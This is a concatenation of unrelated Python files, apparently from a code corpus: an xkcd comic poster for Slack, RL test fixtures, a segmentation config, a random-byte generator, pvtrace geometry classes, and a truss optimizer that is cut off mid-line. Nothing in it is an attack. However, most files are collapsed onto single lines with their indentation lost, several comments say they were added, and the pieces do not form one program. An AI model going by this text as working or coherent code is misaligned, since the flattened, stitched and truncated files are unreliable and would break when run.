#!/usr/bin/python import requests, json, fire, os slack_webhook_url = os.environ['XKCD_SLACK_WEBHOOK_URL'] slack_headers={'Content-Type': 'application/json'} def slack_post(content): _slack_post = requests.post(slack_webhook_url, data=json.dumps(content), headers=slack_headers) return(_slack_post.text) def slack_content_build(title, image, alt): _output = {"text": "*{0}*\n{1}\n{2}".format(title,alt,image)} return(_output) # class named Get for cli usability class Get(object): def comic_current(self): _current_comic = requests.get("https://xkcd.com/info.0.json").json() _title = _current_comic["title"] _alt = _current_comic["alt"] _image = _current_comic["img"] _content = slack_content_build(_title, _image, _alt) slack_post(_content) def comic_by_id(self, comic_id): _comic = requests.get("https://xkcd.com/{0}/info.0.json".format(comic_id)).json() _title = _comic["title"] _alt = _comic["alt"] _image = _comic["img"] _content = slack_content_build(_title, _image, _alt) slack_post(_content) class Pipeline(object): def __init__(self): self.get = Get() if __name__ == '__main__': fire.Fire(Pipeline)
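
# Example invocations (assuming the file is saved as xkcd.py and
# XKCD_SLACK_WEBHOOK_URL is exported). python-fire exposes the Pipeline
# attribute `get` and the Get methods as subcommands:
#
#   python xkcd.py get comic_current
#   python xkcd.py get comic_by_id 353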
python
import pytest import torch from nnrl.nn.actor import ( Alpha, DeterministicPolicy, MLPContinuousPolicy, MLPDeterministicPolicy, ) from nnrl.nn.critic import ActionValueCritic, MLPVValue from nnrl.nn.model import EnsembleSpec, build_ensemble, build_single from ray.rllib import SampleBatch from raylab.utils.debug import fake_batch @pytest.fixture(scope="module") def reward_fn(): def func(obs, act, new_obs): return new_obs[..., 0] - obs[..., 0] - act.norm(dim=-1) return func @pytest.fixture(scope="module") def termination_fn(): def func(obs, *_): return torch.randn_like(obs[..., 0]) > 0 return func @pytest.fixture def batch(obs_space, action_space): samples = fake_batch(obs_space, action_space, batch_size=256) return {k: torch.from_numpy(v) for k, v in samples.items()} @pytest.fixture def obs(batch): return batch[SampleBatch.CUR_OBS] @pytest.fixture def rew(batch): return batch[SampleBatch.REWARDS] @pytest.fixture def done(batch): return batch[SampleBatch.DONES] @pytest.fixture def new_obs(batch): return batch[SampleBatch.NEXT_OBS] @pytest.fixture def model_spec(): spec = EnsembleSpec() spec.network.units = (32,) spec.network.input_dependent_scale = True spec.residual = True return spec @pytest.fixture def model(obs_space, action_space, model_spec): return build_single(obs_space, action_space, model_spec) @pytest.fixture(params=(1, 2, 4), ids=(f"Models({n})" for n in (1, 2, 4))) def models(request, obs_space, action_space, model_spec): spec = model_spec spec.ensemble_size = request.param spec.parallelize = True return build_ensemble(obs_space, action_space, spec) @pytest.fixture(params=(1, 2), ids=(f"Critics({n})" for n in (1, 2))) def action_critics(request, obs_space, action_space): config = { "encoder": {"units": [32]}, "double_q": request.param == 2, "parallelize": False, } spec = ActionValueCritic.spec_cls.from_dict(config) act_critic = ActionValueCritic(obs_space, action_space, spec) return act_critic.q_values, act_critic.target_q_values @pytest.fixture def state_critics(obs_space): spec = MLPVValue.spec_cls() spec.units = (32,) spec.activation = "ReLU" spec.layer_norm = False main, target = MLPVValue(obs_space, spec), MLPVValue(obs_space, spec) return main, target @pytest.fixture def deterministic_policies(obs_space, action_space): spec = MLPDeterministicPolicy.spec_cls( units=(32,), activation="ReLU", norm_beta=1.2 ) policy = MLPDeterministicPolicy(obs_space, action_space, spec) target_policy = DeterministicPolicy.add_gaussian_noise(policy, noise_stddev=0.3) return policy, target_policy @pytest.fixture(params=(True, False), ids=(f"PiScaleDep({b})" for b in (True, False))) def policy_input_scale(request): return request.param @pytest.fixture def stochastic_policy(obs_space, action_space, policy_input_scale): config = {"encoder": {"units": (32,)}} mlp_spec = MLPContinuousPolicy.spec_cls.from_dict(config) return MLPContinuousPolicy( obs_space, action_space, mlp_spec, input_dependent_scale=policy_input_scale ) @pytest.fixture def alpha_module(): return Alpha(1.0)
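
# A small illustrative test (an addition, not from the original suite) showing
# how the reward_fn/termination_fn fixtures compose with the fake-batch
# fixtures above; the action dimension used here is an assumption for the sketch.
def test_reward_and_termination_shapes(reward_fn, termination_fn, obs, new_obs):
    act = torch.zeros(obs.shape[0], 3)
    rew = reward_fn(obs, act, new_obs)
    done = termination_fn(obs, act, new_obs)
    assert rew.shape == (obs.shape[0],)
    assert done.shape == (obs.shape[0],)
    assert done.dtype == torch.bool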
python
_base_ = './fcn_r50-d8_512x512_20k_voc12aug.py' model = dict(pretrained='open-mmlab://resnet101_v1c', backbone=dict(depth=101), decode_head=dict(num_classes=2), auxiliary_head=dict(num_classes=2) ) dataset_type = 'PLDUDataset' # Dataset type, this will be used to define the dataset. data_root = '../data/pldu/' data = dict( samples_per_gpu=2, workers_per_gpu=2, train=dict( type='PLDUDataset', data_root='../data/pldu/', img_dir='img_dir/train', ann_dir='ann_dir/train', split=None, ), val=dict( type='PLDUDataset', data_root='../data/pldu/', img_dir='img_dir/val', ann_dir='ann_dir/val', split=None, ), test=dict( type='PLDUDataset', data_root='../data/pldu/', img_dir='img_dir/val', ann_dir='ann_dir/val', split=None, ) )
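
# This config assumes a custom `PLDUDataset` has been registered with
# mmsegmentation elsewhere in the codebase. A minimal sketch of such a
# registration is shown below for reference; the class names, palette and
# suffixes are assumptions, not taken from the original repository.
#
# from mmseg.datasets.builder import DATASETS
# from mmseg.datasets.custom import CustomDataset
#
# @DATASETS.register_module()
# class PLDUDataset(CustomDataset):
#     CLASSES = ('background', 'powerline')
#     PALETTE = [[0, 0, 0], [255, 255, 255]]
#
#     def __init__(self, **kwargs):
#         super().__init__(img_suffix='.jpg', seg_map_suffix='.png', **kwargs)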
python
import sys
import os
import argparse


def make_streams_binary():
    # Detach the text wrappers so raw bytes can be written straight to stdout.
    sys.stdin = sys.stdin.detach()
    sys.stdout = sys.stdout.detach()


parser = argparse.ArgumentParser(description='generate random data.')
parser.add_argument('--octets', metavar='N', dest='octets', type=int, nargs='?',
                    default=2048, help='number of octets to generate (default: 2048)')
args = parser.parse_args()
octets = args.octets

make_streams_binary()

random_data = os.urandom(octets)
sys.stdout.write(random_data)
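
# Example usage (assuming the script is saved as random_octets.py): write
# 4096 random octets to a file by redirecting stdout.
#
#   python random_octets.py --octets 4096 > random.bin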
python
# pvtrace is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# pvtrace is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.

from Geometry import Box, Cylinder, Ray, cmp_points, separation
from external.transformations import translation_matrix, rotation_matrix
import external.transformations as tf
import numpy as np


def transform_point(point, transform):
    # Apply the 4x4 homogeneous transform to a 3D point.
    return np.array(np.dot(transform, np.matrix(np.concatenate((point, [1.]))).transpose()).transpose()[0, 0:3]).squeeze()


def transform_direction(direction, transform):
    # Directions are only rotated, never translated.
    angle, axis, point = tf.rotation_from_matrix(transform)
    rotation_transform = tf.rotation_matrix(angle, axis)
    return np.array(np.dot(rotation_transform, np.matrix(np.concatenate((direction, [1.]))).transpose()).transpose()[0, 0:3]).squeeze()


class CSGadd(object):
    """
    Constructive Solid Geometry Boolean Addition
    """

    def __init__(self, ADDone, ADDtwo):
        super(CSGadd, self).__init__()
        self.ADDone = ADDone
        self.ADDtwo = ADDtwo
        self.reference = 'CSGadd'
        self.transform = tf.identity_matrix()

    def append_name(self, namestring):
        """
        In case a scene contains several CSG objects, this helps with surface
        identification (see return value of def surface_identifier(..))
        """
        self.reference = namestring

    def append_transform(self, new_transform):
        self.transform = tf.concatenate_matrices(new_transform, self.transform)
        self.ADDone.transform = tf.concatenate_matrices(new_transform, self.ADDone.transform)
        self.ADDtwo.transform = tf.concatenate_matrices(new_transform, self.ADDtwo.transform)

    def contains(self, point):
        """
        Returns True if point contained by CSGadd, False otherwise
        """
        invtransform = tf.inverse_matrix(self.transform)
        local_point = transform_point(point, invtransform)

        bool1 = self.ADDone.contains(local_point)
        bool2 = self.ADDtwo.contains(local_point)
        bool3 = self.ADDone.on_surface(local_point)
        bool4 = self.ADDtwo.on_surface(local_point)

        if bool1 or bool2:
            return True
        if bool3 and bool4:
            return True
        return False

    def intersection(self, ray):
        """
        Returns the intersection points of ray with CSGadd in global frame
        """
        # We will need the invtransform later when we return the results...
        invtransform = tf.inverse_matrix(self.transform)
        localray = Ray()
        localray.position = transform_point(ray.position, invtransform)
        localray.direction = transform_direction(ray.direction, invtransform)

        ADDone__intersections = self.ADDone.intersection(localray)
        ADDtwo__intersections = self.ADDtwo.intersection(localray)

        """
        Cover the simpler cases
        """
        if ADDone__intersections == None and ADDtwo__intersections == None:
            return None

        """
        Change ..._intersections into tuples
        """
        if ADDone__intersections != None:
            for i in range(0, len(ADDone__intersections)):
                point = ADDone__intersections[i]
                new_point = (point[0], point[1], point[2])
                ADDone__intersections[i] = new_point

        if ADDtwo__intersections != None:
            for i in range(0, len(ADDtwo__intersections)):
                point = ADDtwo__intersections[i]
                new_point = (point[0], point[1], point[2])
                ADDtwo__intersections[i] = new_point

        """
        Only intersection points NOT contained in resp.
other structure relevant """ ADDone_intersections = [] ADDtwo_intersections = [] if ADDone__intersections != None: for i in range(0,len(ADDone__intersections)): if self.ADDtwo.contains(ADDone__intersections[i]) == False: ADDone_intersections.append(ADDone__intersections[i]) if ADDtwo__intersections != None: for j in range(0,len(ADDtwo__intersections)): if self.ADDone.contains(ADDtwo__intersections[j]) == False: ADDtwo_intersections.append(ADDtwo__intersections[j]) """ => Convert to list """ ADDone_set = set(ADDone_intersections[:]) ADDtwo_set = set(ADDtwo_intersections[:]) combined_set = ADDone_set | ADDtwo_set combined_intersections = list(combined_set) """ Just in case... """ if len(combined_intersections) == 0: return None """ Sort by separation from ray origin """ intersection_separations = [] for point in combined_intersections: intersection_separations.append(separation(ray.position, point)) """ Convert into Numpy arrays in order to sort """ intersection_separations = np.array(intersection_separations) sorted_indices = intersection_separations.argsort() sorted_combined_intersections = [] for index in sorted_indices: sorted_combined_intersections.append(np.array(combined_intersections[index])) global_frame_intersections = [] for point in sorted_combined_intersections: global_frame_intersections.append(transform_point(point, self.transform)) global_frame_intersections_cleared = [] for point in global_frame_intersections: if self.on_surface(point) == True: """ This is only necessary if the two objects have an entire surface region in common, for example consider two boxes joined at one face. """ global_frame_intersections_cleared.append(point) if len(global_frame_intersections_cleared) == 0: return None return global_frame_intersections_cleared def on_surface(self, point): """ Returns True or False dependent on whether point on CSGadd surface or not """ if self.contains(point): return False invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(point, invtransform) bool1 = self.ADDone.on_surface(local_point) bool2 = self.ADDtwo.on_surface(local_point) if bool1 == True and self.ADDtwo.contains(local_point) == False: return True if bool2 == True and self.ADDone.contains(local_point) == False: return True if bool1 == bool2 == True: return True else: return False def surface_identifier(self, surface_point, assert_on_surface = True): """ Returns surface-ID name if surface_point located on CSGadd surface """ """ Ensure surface_point on CSGadd surface """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(surface_point, invtransform) bool1 = self.ADDone.on_surface(local_point) bool2 = self.ADDtwo.on_surface(local_point) assertbool = False if bool1 == True and self.ADDtwo.contains(local_point) == False: assertbool = True elif bool2 == True and self.ADDone.contains(local_point) == False: assertbool = True elif bool1 == bool2 == True: assertbool = True if assert_on_surface == True: assert assertbool == True if bool1 == True and self.ADDtwo.contains(local_point) == False: return self.reference + "_ADDone_" + self.ADDone.surface_identifier(local_point) if bool2 == True and self.ADDone.contains(local_point) == False: return self.reference + "_ADDtwo_" + self.ADDtwo.surface_identifier(local_point) def surface_normal(self, ray, acute=True): """ Returns surface normal in point where ray hits CSGint surface """ """ Ensure surface_point on CSGint surface """ invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = 
transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) bool1 = self.ADDone.on_surface(localray.position) bool2 = self.ADDtwo.on_surface(localray.position) assertbool = False if bool1 == True and self.ADDtwo.contains(localray.position) == False: assertbool = True elif bool2 == True and self.ADDone.contains(localray.position) == False: assertbool = True elif bool1 == bool2 == True: assertbool = True assert assertbool == True if bool1 == True and self.ADDtwo.contains(localray.position) == False: local_normal = self.ADDone.surface_normal(localray, acute) return transform_direction(local_normal, self.transform) if bool2 == True and self.ADDone.contains(localray.position) == False: local_normal = self.ADDtwo.surface_normal(localray, acute) return transform_direction(local_normal, self.transform) class CSGsub(object): """ Constructive Solid Geometry Boolean Subtraction """ def __init__(self, SUBplus, SUBminus): """ Definition {CSGsub} := {SUBplus}/{SUBminus} """ super(CSGsub, self).__init__() self.SUBplus = SUBplus self.SUBminus = SUBminus self.reference = 'CSGsub' self.transform = tf.identity_matrix() def append_name(self, namestring): """ In case a scene contains several CSG objects, this helps with surface identification """ self.reference = namestring def append_transform(self, new_transform): self.transform = tf.concatenate_matrices(new_transform, self.transform) def contains(self, point): """ Returns True if ray contained by CSGsub, False otherwise """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(point, invtransform) bool1 = self.SUBplus.contains(local_point) bool2 = self.SUBminus.contains(local_point) if bool1 == False: return False if bool2 == True: return False else: return True def intersection(self, ray): """ Returns the intersection points of ray with CSGsub in global frame """ # We will need the invtransform later when we return the results..." 
invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) SUBplus__intersections = self.SUBplus.intersection(localray) SUBminus__intersections = self.SUBminus.intersection(localray) """ Cover the simpler cases """ if SUBplus__intersections == None and SUBminus__intersections == None: return None """ Change ..._intersections into tuples """ if SUBplus__intersections != None: for i in range(0,len(SUBplus__intersections)): point = SUBplus__intersections[i] new_point = (point[0], point[1], point[2]) SUBplus__intersections[i] = new_point if SUBminus__intersections != None: for i in range(0,len(SUBminus__intersections)): point = SUBminus__intersections[i] new_point = (point[0], point[1], point[2]) SUBminus__intersections[i] = new_point """ Valid intersection points: SUBplus intersections must lie outside SUBminus SUBminus intersections must lie inside SUBplus """ SUBplus_intersections = [] SUBminus_intersections = [] if SUBplus__intersections != None: for intersection in SUBplus__intersections: if not self.SUBminus.contains(intersection): SUBplus_intersections.append(intersection) if SUBminus__intersections != None: for intersection in SUBminus__intersections: if self.SUBplus.contains(intersection): SUBminus_intersections.append(intersection) # SUBplus_set = set(SUBplus_intersections[:]) # SUBminus_set = set(SUBminus_intersections[:]) # combined_set = SUBplus_set ^ SUBminus_set # combined_intersections = list(combined_set) combined_intersections = np.array(list(set(SUBplus_intersections+SUBminus_intersections))) # intersection_separations = combined_intersections[0]**2+combined_intersections[1]**2+combined_intersections[2]**2 """ Just in case... """ if len(combined_intersections) == 0: return None transposed_intersections = combined_intersections.transpose() intersection_vectors = transposed_intersections[0]-ray.position[0], transposed_intersections[1]-ray.position[1], transposed_intersections[2]-ray.position[2] # intersection_separations= [] # print combined_intersections, point, intersection_vectors intersection_separations = intersection_vectors[0]**2+intersection_vectors[1]**2+intersection_vectors[2]**2 # for point in combined_intersections: # intersection_separations.append(separation(ray.position, point)) # for i in range(len(intersection_separations)): # print intersection_separations[i], intersection_separations2[i] """ Sort by distance from ray origin => Use Numpy arrays """ # intersection_separations = np.array(intersection_separations) sorted_combined_intersections = combined_intersections[intersection_separations.argsort()] # sorted_combined_intersections = [] # for index in sorted_indices: # sorted_combined_intersections.append(np.array(combined_intersections[index])) # global_frame_intersections = [] # for point in sorted_combined_intersections: # global_frame_intersections.append(transform_point(point, self.transform)) global_frame_intersections = [transform_point(point, self.transform) for point in sorted_combined_intersections] return global_frame_intersections def on_surface(self, point): """ Returns True if the point is on the outer or inner surface of the CSGsub, and False othewise. 
""" invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(point, invtransform) bool1 = self.SUBplus.on_surface(local_point) bool2 = self.SUBminus.on_surface(local_point) if bool1 == True and self.SUBminus.contains(local_point) == False: return True if bool2 == True and self.SUBplus.contains(local_point) == True: return True else: return False """ Alternatively: if bool1 == bool2 == False: return False if bool1 == True and bool2 == True or SUBminus.contains(point) == True: return False if bool2 == True and bool1 == True or SUBplus.contains(point) == False: return False else: return True """ def surface_identifier(self, surface_point, assert_on_surface = True): """ Returns a unique identifier for the surface location on the CSGsub. """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(surface_point, invtransform) bool1 = self.SUBplus.on_surface(local_point) bool2 = self.SUBminus.on_surface(local_point) assertbool = False if bool1 == True and self.SUBminus.contains(local_point) == False: assertbool = True elif bool2 == True and self.SUBplus.contains(local_point) == True: assertbool = True if assert_on_surface == True: assert assertbool == True if bool1 == True and self.SUBminus.contains(local_point) == False: return self.reference + "_SUBplus_" + self.SUBplus.surface_identifier(local_point) if bool2 == True and self.SUBplus.contains(local_point) == True: return self.reference + "_SUBminus_" + self.SUBminus.surface_identifier(local_point) def surface_normal(self, ray, acute=True): """ Return the surface normal for a ray arriving on the CSGsub surface. """ invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) bool1 = self.SUBplus.on_surface(localray.position) bool2 = self.SUBminus.on_surface(localray.position) assertbool = False if bool1 == True and self.SUBminus.contains(localray.position) == False: assertbool = True if bool2 == True and self.SUBplus.contains(localray.position) == True: assertbool = True assert assertbool == True if bool1 == True and self.SUBminus.contains(localray.position) == False: return self.SUBplus.surface_normal(ray, acute) if bool2 == True and self.SUBplus.contains(localray.position) == True: if acute: return self.SUBminus.surface_normal(ray,acute) else: normal = -1 * self.SUBminus.surface_normal(ray, acute=True) # Remove signed zeros for i in range(0,3): if normal[i] == 0.0: normal[i] = 0.0 return normal class CSGint(object): """ Constructive Solid Geometry Boolean Intersection """ def __init__(self, INTone, INTtwo): super(CSGint, self).__init__() self.INTone = INTone self.INTtwo = INTtwo self.reference = 'CSGint' self.transform = tf.identity_matrix() def append_name(self, namestring): """ In case a scene contains several CSG objects, this helps with surface identification """ self.reference = namestring def append_transform(self, new_transform): self.transform = tf.concatenate_matrices(new_transform, self.transform) def contains(self, point): """ Returns True if ray contained by CSGint, False otherwise """ invtransform = tf.inverse_matrix(self.transform) point = transform_point(point, invtransform) bool1 = self.INTone.contains(point) bool2 = self.INTtwo.contains(point) if bool1 == bool2 == True: return True else: return False def intersection(self, ray): """ Returns the intersection points of ray with CSGint in global frame """ # We will need the invtransform later when 
we return the results..." invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) INTone__intersections = self.INTone.intersection(localray) INTtwo__intersections = self.INTtwo.intersection(localray) """ Cover the simpler cases """ if INTone__intersections == None and INTtwo__intersections == None: return None """ Change ..._intersections into tuples """ if INTone__intersections != None: for i in range(0,len(INTone__intersections)): point = INTone__intersections[i] new_point = (point[0], point[1], point[2]) INTone__intersections[i] = new_point if INTtwo__intersections != None: for i in range(0,len(INTtwo__intersections)): point = INTtwo__intersections[i] new_point = (point[0], point[1], point[2]) INTtwo__intersections[i] = new_point """ Only intersection points contained in resp. other structure relevant """ INTone_intersections = [] INTtwo_intersections = [] if INTone__intersections != None: for i in range(0,len(INTone__intersections)): if self.INTtwo.contains(INTone__intersections[i]) == True: INTone_intersections.append(INTone__intersections[i]) if INTtwo__intersections != None: for j in range(0,len(INTtwo__intersections)): if self.INTone.contains(INTtwo__intersections[j]) == True: INTtwo_intersections.append(INTtwo__intersections[j]) """ => Convert to list """ INTone_set = set(INTone_intersections[:]) INTtwo_set = set(INTtwo_intersections[:]) combined_set = INTone_set | INTtwo_set combined_intersections = list(combined_set) """ Just in case... """ if len(combined_intersections) == 0: return None """ Sort by separation from ray origin """ intersection_separations = [] for point in combined_intersections: intersection_separations.append(separation(ray.position, point)) """ Convert into Numpy arrays in order to sort """ intersection_separations = np.array(intersection_separations) sorted_indices = intersection_separations.argsort() sorted_combined_intersections = [] for index in sorted_indices: sorted_combined_intersections.append(np.array(combined_intersections[index])) global_frame_intersections = [] for point in sorted_combined_intersections: global_frame_intersections.append(transform_point(point, self.transform)) return global_frame_intersections def on_surface(self, point): """ Returns True or False dependent on whether point on CSGint surface or not """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(point, invtransform) bool1 = self.INTone.on_surface(local_point) bool2 = self.INTtwo.on_surface(local_point) if bool1 == bool2 == True: return True if bool1 == True and self.INTtwo.contains(local_point): return True if bool2 == True and self.INTone.contains(local_point): return True else: return False def surface_identifier(self, surface_point, assert_on_surface = True): """ Returns surface-ID name if surface_point located on CSGint surface """ """ Ensure surface_point on CSGint surface """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(surface_point, invtransform) bool1 = self.INTone.on_surface(local_point) bool2 = self.INTtwo.on_surface(local_point) assertbool = False if bool1 == True and self.INTtwo.contains(local_point) == True: assertbool = True if bool2 == True and self.INTone.contains(local_point) == True: assertbool = True if bool1 == bool2 == True: assertbool = True if assert_on_surface == True: assert assertbool == True if bool1 == True: return self.reference + "_INTone_" 
+ self.INTone.surface_identifier(local_point) if bool2 == True: return self.reference + "_INTtwo_" + self.INTtwo.surface_identifier(local_point) def surface_normal(self, ray, acute=True): """ Returns surface normal in point where ray hits CSGint surface """ """ Ensure surface_point on CSGint surface """ invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) bool1 = self.INTone.on_surface(localray.position) bool2 = self.INTtwo.on_surface(localray.position) assertbool = False if bool1 == True and self.INTtwo.contains(localray.position) == True: assertbool = True if bool2 == True and self.INTone.contains(localray.position) == True: assertbool = True if bool1 == bool2 == True: assertbool = True assert assertbool == True if bool1 == True: return self.INTone.surface_normal(ray, acute) else: return self.INTtwo.surface_normal(ray, acute) if __name__ == '__main__': """ TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST """ """ # EXAMPLE ZERO INTone = Box(origin = (-1.,0.,0.), extent = (1,1,1)) INTtwo = Cylinder(1, 1) #one.append_transform(tf.rotation_matrix(np.pi/4, (0,0,1))) intersect = CSGint(INTone, INTtwo) INTthree = Cylinder(0.5,1) intersect2 = CSGint(intersect, INTthree) """ """ # EXAMPLE ONE obj1 = Box(origin=(0,0,0), extent=(3,3,5)) obj2 = Box(origin=(1,1,0), extent=(2,2,7)) boxbox = CSGadd(obj2, obj1) boxbox.append_name('MyBoxBox') pt = (1,3,1.5) ray = Ray(position=(1,3,1.5), direction=(0.,-1.,0.)) print "Point: " print pt print "Ray position: " print ray.position print "Ray direction: " print ray.direction print "\n----> test .contains(pt) " print obj1.contains(pt) print obj2.contains(pt) print boxbox.contains(pt) print "\n----> test .on_surface(pt)" print obj1.on_surface(pt) print obj2.on_surface(pt) print boxbox.on_surface(pt) print "\n----> test .surface_identifier(pt)" print boxbox.surface_identifier(pt) print "\n----> test .intersection(ray)" print obj1.intersection(ray) print obj2.intersection(ray) print boxbox.intersection(ray) print "\n----> test .surface_normal(ray)" print boxbox.surface_normal(ray) # END EXAMPLE ONE """ """ # EXAMPLE TWO: ITERATIVE ADDITION obj1 = Box(origin=(0,0,0), extent=(1,1,1)) obj2 = Box(origin=(0,0,0), extent=(1,1,1)) #obj2.append_transform(tf.translation_matrix((0,2,0))) obj2.append_transform(tf.rotation_matrix(np.pi/4, (0,0,1))) print obj2.transform boxbox1 = CSGadd(obj2, obj1) boxbox1.append_name('MyBoxBox1') boxbox1.append_transform(tf.translation_matrix((0,0,0))) boxbox2 = CSGadd(obj2, obj1) boxbox2.append_name('MyBoxBox2') boxbox2.append_transform(tf.translation_matrix((0,0,2))) fourbox = CSGadd(boxbox1, boxbox2) fourbox.append_name('MyFourBox') print boxbox1.transform print '\n' print boxbox2.transform print '\n' print fourbox.transform print '\n' print obj2.intersection(ray) ray = Ray(position=(0.5,10,0.5), direction=(0,-1,0)) print fourbox.intersection(ray) ray = Ray(position=(0.5,10,2.5), direction=(0,-1,0)) print fourbox.intersection(ray) print '\nSurface_ID for FourBox' print fourbox.surface_identifier((0.9,3,0.5)) """ """ obj1 = Box(origin=(0,0,0), extent=(1,1,1)) obj2 = Box(origin=(0,0,0), extent=(1,1,1)) obj2.append_transform(tf.rotation_matrix(np.pi/4, (0,0,1))) obj2.append_transform(tf.translation_matrix((0.5,0,0))) add = CSGadd(obj1, obj2) ray = Ray(position=(0.50000000001,10,0.5), direction=(0,-1,0)) print add.intersection(ray) """ """ # EXAMPLE THREE # Illustrates that if 
for example two boxes are joined at # one face with CSGadd, then none of the points on this face are # surface points (as should be for most of these points). # However, a ray that is contained in that face will # not return any intersection points with the CSGadd object # (which should not be for some points). obj1 = Box(origin=(0,0,0), extent=(1,1,1)) obj2 = Box(origin=(0,1,0), extent=(1,2,1)) add = CSGadd(obj1, obj2) ray = Ray(position=(0.5,10,0.5), direction=(0,-1,0)) print add.intersection(ray) print add.on_surface((0.5,1,0.5)) print add.contains((0.5,1.,0.5)) ray = Ray(position=(10,1,0.5), direction=(-1,0,0)) print add.intersection(ray) """ """ # EXAMPLE FOUR: CSG VISUALISER INTone = Box(origin = (-1.,-1.,-0.), extent = (1,1,7)) INTtwo = Box(origin = (-0.5,-0.5,0), extent = (0.5,0.5,7)) #INTtwo.append_transform(tf.translation_matrix((0,0.5,0))) INTtwo.append_transform(tf.rotation_matrix(np.pi/4, (0,0,1))) MyObj = CSGsub(INTone, INTtwo) MyObj.append_name('myobj') vis=Visualiser() vis.VISUALISER_ON = True vis.addCSG(MyObj,0.03,-1,1,-1,1,0,10,visual.color.green) #vis.addCSG(MyObj, visual.color.blue) """ """ box1 = Box() box2 = Box(origin = (0.2,.2,0), extent = (0.8,0.8,1)) csg = CSGsub(box1, box2) ray = Ray(position = (0.5,0.8,0.5), direction = (0,-1,0)) normal = csg.surface_normal(ray, acute = False) print normal normal = csg.surface_normal(ray, acute = False) print normal """
python
import numpy as np import math import Graphics from typing import List import json from scipy.optimize import fmin_powell Vector = List[float] import time class Node (object): """A object that defines a position""" def __init__(self, name: str, pos, constraint_x=0, constraint_y=0): """Node: has a name, position and constraints. The loads are are added when the distributed weight is placed on the beam. A optional value is optimize, for each dimension the position of the node can be optimized t optimise the construction""" self.name: str = name self.pos = np.array(pos) self.load: Vector = np.array([0, 0]) self.load_list = np.array([0]) self.constraint_x = constraint_x self.constraint_y = constraint_y self.optimize: List = np.array([0, 0]) def __str__(self): text: str = self.name text += ": " + str(self.pos) return text class Beam (object): """A beam or rod that is positioned between two nodes A beam knows the two nodes it is placed between and therefore its length, with other data as density and cross-section area the weight can be determined, the placed load is divided for the two nodes.""" def __init__(self, name: str, nodes, v_load, a, b): self.name: str = name self.length: float = self.absolute(nodes[a].pos-nodes[b].pos) self.a_node = a self.b_node = b self.pos1: Vector = nodes[a].pos self.pos2: Vector = nodes[b].pos self.load: Vector = np.array(v_load) self.load_nodes: Vector = 0.5 * np.array(v_load) * self.length self.delta_0: Vector = nodes[a].pos-nodes[b].pos self.delta_1: Vector = nodes[b].pos - nodes[a].pos self.angle_0: float = math.atan2(self.delta_0[1], self.delta_0[0]) self.angle_1: float = math.atan2(self.delta_1[1], self.delta_1[0]) self.area = 0.10 self.E_modulus = 210 * 1e+9 self.density = 7850 self.yield_strength = 250 * 1e+6 self.internal_force = 0 self.weight = 0.0 self.connections = np.zeros(len(2 * nodes)) self.connections[2 * a] = math.cos(self.angle_0) self.connections[2 * a + 1] = math.sin(self.angle_0) self.connections[2 * b] = math.cos(self.angle_1) self.connections[2 * b + 1] = math.sin(self.angle_1) @staticmethod def absolute(arr): """Return the absolute length of a vector""" return np.linalg.norm(arr) def calculate_beam_weight(self, new_force): """ calculates weight of a beam using the internal force of the beam and yield strength of the material :param new_force: :return: - """ self.internal_force = abs(new_force) if new_force >= 0: # Force is stretching beam self.area = self.internal_force / self.yield_strength else: # Force is compressing beam self.area = math.pow(((self.internal_force * (0.5 * self.length) ** 2 / ( math.pi ** 2 * self.E_modulus)) / (math.pi / 4)), 1 / 2) * math.pi self.weight = self.area * self.length * self.density def __str__(self): """ Overwrites str method, prints important data of the beam :return text: """ text: str = "\n" text += "Beam: " + self.name + "\n" text += "\tLength: {0:.2f} m\n".format(round(self.length, 2)) text += "\tArea: {0:.2f} mm²\n".format(round(self.area * 1e6, 2)) text += "\tWeight: {0:.3f} kg\n".format(round(self.weight, 3)) return text def single_line(self): text: str = self.name text += ": {0:.2f}m".format(round(self.length, 2)) text += ", {0:.2f}mm²".format(round(self.area * 1e6, 2)) text += ", {0:.3f}kg".format(round(self.weight, 3)) return text class Construction(object): def __init__(self, name: str, nodes: List, beam_list: List, load_list: List): """ Creates a construction with the given nodes, beam, loads and constraints :param name: :param nodes: :param beam_list: """ self.temp_beams = beam_list 
self.materials = {} self.material: str = "" self.name: str = name self.window = Graphics.Construction("Bridge 1", 1280, 720) self.nodes: List = nodes self.beams: List = [] self.current_loads = 0 self.load_list = load_list self.beams = [] self.last_iteration = False self.max_beams = [] self.set_beams() self.optional_loads: List = [] self.iteration = 0 # Declare later used data self.matrix = [] self.B = [] self.X = [] self.weight = np.inf self.get_materials() self.inter_plot = False print("Construction created...") def set_beams(self): """ Rebuilds all beams between the nodes with the new values :return: """ self.beams = [] for x in range(0, len(self.temp_beams)): self.beams.append(Beam(str(self.temp_beams[x][0]), self.nodes, self.load_list[self.current_loads][x], self.temp_beams[x][1], self.temp_beams[x][2])) def optimize(self, active=True, inter_plot=True): """ Optimize will generate a construction with minimal weight for the load that is given Optional: active will activate the minimization function to create a highly optimized construction :param active: :param inter_plot: :return: """ self.inter_plot = inter_plot initial_guess = [] for x in range(0, len(self.nodes)): if not np.any(self.nodes[x].optimize): continue for val in range(0, len(self.nodes[x].optimize)): if 